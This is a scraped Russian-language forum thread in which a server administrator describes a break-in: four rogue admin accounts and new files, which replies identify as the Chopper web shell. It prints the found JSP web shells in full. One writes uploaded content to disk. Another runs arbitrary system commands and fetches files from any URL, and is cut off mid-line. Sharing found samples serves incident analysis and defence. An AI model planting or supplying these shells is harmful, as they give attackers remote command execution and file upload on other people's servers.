https://opennet.ru/openforum/vsluhforumID10/5571.html Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них<br>&lt;%<br> if("toe0Kq".equals(request.getParameter("pwd")))<br> {<br> String strCode=request.getParameter("code");<br> String strFile=request.getParameter("file");<br> if(strCode!=null&&strFile!=null)<br> {<br> java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());<br> byte[] b = new byte[1024];<br> java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();<br> int a = -1;<br> while ((a = in.read(b)) != -1)<br> {<br> bs.write(b, 0, a);<br> }<br> new java.io.FileOutputStream(application.getRealPath("/")+"/img/"+strFile).write(bs.toByteArray());<br> }<br> out.print("XkaGrVj9");<br> }<br>%&gt;<br> https://opennet.ru/openforum/vsluhforumID10/5571.html#6 Wed, 27 Jan 2021 13:02:02 GMT &gt;&gt; и троян Trojan:JS/Chopper.YA!MTB <br>&gt; На Винде? :) <br><br>На винде скаченный файл открыть защитник не дает<br> https://opennet.ru/openforum/vsluhforumID10/5571.html#5 Tue, 26 Jan 2021 15:00:35 GMT &gt; и троян Trojan:JS/Chopper.YA!MTB <br><br>На Винде? :)<br> https://opennet.ru/openforum/vsluhforumID10/5571.html#4 Mon, 25 Jan 2021 13:10:10 GMT Было незаметно, раз в полгода прокачивали рассылки 1 день про взломанные аккаунты с ссылками на свой сайт. На Россию не рассылали, все за бугор.<br> https://opennet.ru/openforum/vsluhforumID10/5571.html#3 Mon, 25 Jan 2021 12:53:32 GMT и троян Trojan:JS/Chopper.YA!MTB<br> https://opennet.ru/openforum/vsluhforumID10/5571.html#2 Mon, 25 Jan 2021 12:50:24 GMT /*<br> * Generated by the Jasper component of Apache Tomcat<br> * Version: jetty/9.3.5.v20151012<br> * Generated at: 2019-04-02 11:49:44 UTC<br> * Note: The last modified time of this file was set to<br> * the last modified time of the source file after<br> * generation to assist with modification tracking.<br> */<br>package org.apache.jsp.img;<br><br>import javax.servlet.*;<br>import javax.servlet.http.*;<br>import javax.servlet.jsp.*;<br><br>public final class fc47_jsp extends org.apache.jasper.runtime.HttpJspBase<br> implements org.apache.jasper.runtime.JspSourceDependent,<br> org.apache.jasper.runtime.JspSourceImports {<br><br> private static final javax.servlet.jsp.JspFactory _jspxFactory =<br> javax.servlet.jsp.JspFactory.getDefaultFactory();<br><br> private static java.util.Map&lt;java.lang.String,java.lang.Long&gt; _jspx_dependants;<br><br> private static final java.util.Set&lt;java.lang.String&gt; _jspx_imports_packages;<br><br> private static final java.util.Set&lt;java.lang.String&gt; _jspx_imports_classes;<br><br> static { https://opennet.ru/openforum/vsluhforumID10/5571.html#1 Mon, 25 Jan 2021 12:47:17 GMT &lt;%<br> if("G5X49Q".equals(request.getParameter("pwd")))<br> {<br> String strCmd=request.getParameter("cmd");<br> String strUrl=request.getParameter("url");<br> String strFile=request.getParameter("file");<br> if(null!=strCmd)<br> {<br> java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();<br> int a = -1;<br> byte[] b = new byte[2048];<br> out.print("&lt;pre&gt;");<br> while((a=in.read(b))!=-1)<br> {<br> out.println(new String(b));<br> }<br> out.print("&lt;/pre&gt;");<br> }<br> if(null!=strUrl&&null!=strFile)<br> {<br> java.io.InputStream in = new java.net.URL(strUrl).openStream();<br> byte[] b = new byte[1024];<br> java.io.ByteArrayOutputStream baos = new<br> java.io.ByteArrayOutputStream();<br> int a = -1;<br> while ((a = in.read(b)) != -1)<br> {<br> baos.write(b, 0, a);<br> }<br> n